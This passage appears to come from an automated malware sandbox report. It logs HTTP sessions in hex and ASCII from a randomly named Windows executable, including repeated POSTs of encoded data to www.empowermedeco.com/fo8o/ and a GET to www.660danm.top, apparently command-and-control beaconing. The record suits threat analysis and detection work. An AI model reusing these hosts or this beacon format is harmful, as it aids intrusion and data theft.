51 69 6a 32 57 37 79 62 37 5a 6a 4e 78 4e 54 6a 49 70 62 4f 47 63 38 44 63 57 73 76 64 47 62 65 50 7a 52 70 4c 4e 78 48 31 4b 6b 58 78 71 66 65 55 36 72 34 44 76 48 36 67 65 53 2f 2f 4b 69 4c 33 7a 70 50 62 5a 65 4e 54 51 56 67 71 70 77 77 56 51 68 46 37 74 6e 30 74 59 71 52 63 37 4c 4f 44 36 57 70 56 72 37 6b 30 52 55 65 58 55 4f 4c 57 79 61 46 56 4f 70 63 70 7a 34 55 4d 36 58 32 74 74 71 6e 79 59 47 6a 73 71 70 49 71 50 41 5a 44 71 4f 64 6c 34 67 6e 66 55 7a 5a 4b 5a 65 6f 66 41 74 68 70 35 68 4a 48 31 77 52 31 70 75 41 37 2f 31 73 68 55 4f 50 63 45 4e 6c 6d 2f 70 67 61 72 78 31 4f 46 43 69 2f 4e 44 72 34 38 6c 70 61 62 36 4a 41 65 6f 56 4c 6c 47 4f 70 50 64 43 78 46 48 7a 2b 6c 4e 48 4d 57 78 79 4e 4d 4d 47 72 67 4a 46 56 54 6f 62 63 50 66 7a 6e 79 77 54 6b 7a 53 33 53 69 52 57 62 4b 62 69 4c 4e 34 78 6d 69 67 32 48 71 7a 6c 35 66 45 6e 79 49 73 58 41 6f 2f 43 55 4e 7a 66 58 32 6e 6f 55 64 6d 6c 75 39 6f 46 42 7a 48 39 44 36 49 51 6a 43 6c 7a 38 6d 57 77 69 52 57 48 4a 49 30 2b 58 38 63 4b 37 5a 4f 75 41 75 32 73 4d 75 78 57 6b 58 55 32 4e 66 53 32 36 4f 77 66 2b 6a 4e 64 2f 6e 50 54 64 44 70 2f 57 2b 50 77 51 42 66 4a 67 79 76 72 50 69 71 45 4e 51 72 48 4a 31 47 63 45 44 78 4f 6c 67 49 6b 44 42 66 72 6d 4c 37 6d 46 2b 4f 63 56 56 36 61 55 7a 35 38 5a 50 2f 62 52 55 75 45 7a 44 46 69 52 35 34 78 33 31 6d 73 71 69 68 41 37 31 50 32 31 42 52 59 49 61 4a 74 6f 41 4f 47 58 4b 34 31 35 43 71 76 75 4a 72 38 35 36 79 67 36 39 42 72 32 6f 56 70 4c 4d 2b 63 6d 2b 52 33 64 37 69 2b 39 66 65 4d 68 62 6f 44 41 4b 47 51 73 41 42 57 48 62 63 46 67 31 4e 4f 31 58 74 76 79 59 52 58 31 2f 50 6a 42 36 59 57 57 71 31 42 4e 66 79 2b 51 66 37 37 69 6a 73 69 68 48 6e 6f 53 58 50 54 64 52 6e 32 42 39 4f 4c 41 39 42 79 62 78 65 76 38 30 35 61 30 6d 56 71 63 56 76 77 44 79 58 42 47 76 44 71 79 32 55 4c 48 36 52 36 6b 75 50 42 4c 66 32 6c 6c 53 54 5a 70 53 42 4e 30 56 37 36 46 55 57 55 68 57 6f 4f 53 78 31 6f 6b 37 2f 38 68 65 6e 35 47 53 4e 4c 54 43 32 56 66 41 67 70 5a 30 6e 55 69 51 41 41 72 31 36 2b 5a 6c 63 79 56 59 46 52 55 53 62 34 53 79 50 68 76 51 7a 45 53 75 36 55 75 67 6a 58 43 6a 45 75 37 36 34 51 75 5a 58 2b 64 4e 72 30 48 43 64 4f 7a 64 52 65 61 75 59 46 4c 6b 50 45 34 31 7a 41 42 44 55 2b 53 72 6a 39 42 7a 30 55 75 52 51 30 68 2b 64 71 2f 78 7a 4f 71 36 46 43 47 54 51 35 79 41 42 34 54 42 32 65 2b 36 78 4c 57 5a 4f 59 38 48 4a 37 76 74 32 4a 57 34 4c 69 55 78 52 4d 75 58 6a 6f 76 72 51 5a 37 76 5a 41 56 43 6d 31 6e 72 4b 71 68 59 76 6b 54 56 71 66 65 43 66 41 46 5a 55 63 4e 43 54 61 79 66 6f 53 6a 59 6b 39 38 68 79 4f 51 33 47 43 6d 6c 6d 4f 75 42 56 61 43 4d 31 55 62 4e 57 53 6b 45 42 64 30 46 44 51 35 67 33 39 69 36 6c 5a 50 4d 33 65 44 4f 61 45 64 76 58 62 74 34 6c 6d 73 32 75 33 75 38 30 78 41 58 6f 69 73 59 69 56 2b 57 39 62 56 75 45 53 59 68 57 79 33 37 32 4f 4f 6e 6c 66 4c 65 54 68 72 79 49 66 32 63 44 36 62 46 6b 38 58 6e 34 4c 4f 6e 74 4f 53 62 77 32 76 39 4f 4e 34 46 6e 6d 55 70 6f 30 58 44 33 56 64 46 55 78 73 42 6a 4d 64 4a 7a 41 43 6e 4f 76 38 6f 61 43 69 70 45 6e 48 77 36 30 71 6a 73 55 57 79 75 72 6a 74 79 65 48 7a 4a 4b 45 65 30 6f 78 65 39 52 5a 57 65 34 46 4e 61 6b 3d Data Ascii: bD=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICA9hQVQhEsWkEW2AHoLUymFgWxQij2W7yb7ZjNxNTjIpbOGc8DcWsvdGbePzRpLNxH1KkXxqfeU6r4DvH6geS//KiL3zpPbZeNTQVgqpwwVQhF7tn0tYqRc7LOD6WpVr7k0RUeXUOLWyaFVOpcpz4UM6X2ttqnyYGjsqpIqPAZDqOdl4gnfUzZKZeofAthp5hJH1wR1puA7/1shUOPcENlm/pgarx1OFCi/NDr48lpab6JAeoVLlGOpPdCxFHz+lNHMWxyNMMGrgJFVTobcPfznywTkzS3SiRWbKbiLN4xmig2Hqzl5fEnyIsXAo/CUNzfX2noUdmlu9oFBzH9D6IQjClz8mWwiRWHJI0+X8cK7ZOuAu2sMuxWkXU2NfS26Owf+jNd/nPTdDp/W+PwQBfJgyvrPiqENQrHJ1GcEDxOlgIkDBfrmL7mF+OcVV6aUz58ZP/bRUuEzDFiR54x31msqihA71P21BRYIaJtoAOGXK415CqvuJr856yg69Br2oVpLM+cm+R3d7i+9feMhboDAKGQsABWHbcFg1NO1XtvyYRX1/PjB6YWWq1BNfy+Qf77ijsihHnoSXPTdRn2B9OLA9Bybxev805a0mVqcVvwDyXBGvDqy2ULH6R6kuPBLf2llSTZpSBN0V76FUWUhWoOSx1ok7/8hen5GSNLTC2VfAgpZ0nUiQAAr16+ZlcyVYFRUSb4SyPhvQzESu6UugjXCjEu764QuZX+dNr0HCdOzdReauYFLkPE41zABDU+Srj9Bz0UuRQ0h+dq/xzOq6FCGTQ5yAB4TB2e+6xLWZOY8HJ7vt2JW4LiUxRMuXjovrQZ7vZAVCm1nrKqhYvkTVqfeCfAFZUcNCTayfoSjYk98hyOQ3GCmlmOuBVaCM1UbNWSkEBd0FDQ5g39i6lZPM3eDOaEdvXbt4lms2u3u80xAXoisYiV+W9bVuESYhWy372OOnlfLeThryIf2cD6bFk8Xn4LOntOSbw2v9ON4FnmUpo0XD3VdFUxsBjMdJzACnOv8oaCipEnHw60qjsUWyurjtyeHzJKEe0oxe9RZWe4FNak=
Apr 19, 2024 03:30:54.847872019 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 19 Apr 2024 01:30:54 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Apr 19, 2024 03:30:54.850615978 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49761	34.111.148.214	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:57.194967985 CEST	511	OUT	GET /fo8o/?VVq=lF_H&bD=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrJNroXeq/Q4lVX4E9J28Ip9JfR0m5D5TtgLDY+NMsBNkqmJUMcRE= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.660danm.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:30:57.488369942 CEST	300	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 19 Apr 2024 01:30:57 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Apr 19, 2024 03:30:57.501636028 CEST	1289	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Apr 19, 2024 03:30:57.501698017 CEST	1289	IN	Data Raw: 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65 3d 30 3b Data Ascii: o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf("u
Apr 19, 2024 03:30:57.501739025 CEST	1289	IN	Data Raw: 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c 7c 6e 2e 6d 61 74 Data Ascii: LowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1"):send(
Apr 19, 2024 03:30:57.501776934 CEST	1289	IN	Data Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 Data Ascii: reateElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=window.inn
Apr 19, 2024 03:30:57.501813889 CEST	5	IN	Data Raw: 68 74 6d 6c 3e Data Ascii: html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49762	217.196.55.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:31:03.070816040 CEST	790	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f Data Ascii: bD=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
Apr 19, 2024 03:31:03.212836981 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 19 Apr 2024 01:31:03 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49763	217.196.55.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:31:05.749131918 CEST	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d Data Ascii: bD=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
Apr 19, 2024 03:31:05.891309023 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 19 Apr 2024 01:31:05 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49764	217.196.55.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:31:08.416793108 CEST	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 58 65 56 49 44 69 78 44 62 6e 57 49 50 69 78 65 35 54 48 4f 6a 31 51 58 38 51 37 79 71 50 6b 6b 78 6a 48 41 78 74 2b 67 67 70 69 77 65 65 41 67 31 77 50 37 36 4c 43 33 37 72 66 36 47 61 49 35 53 41 53 76 6f 6e 44 68 4b 4d 4b 34 32 5a 77 6a 4c 6e 59 43 62 7a 4c 70 73 44 57 36 2b 6c 78 74 4e 55 36 4b 59 30 4f 70 53 4d 4f 79 42 39 74 70 51 55 59 41 42 52 32 74 4f 36 7a 63 47 71 52 47 68 46 65 4f 38 63 44 62 38 37 31 57 4b 76 4a 56 32 6b 49 75 38 56 6d 71 59 4e 70 49 66 43 53 69 4c 55 42 35 74 57 31 38 56 75 6b 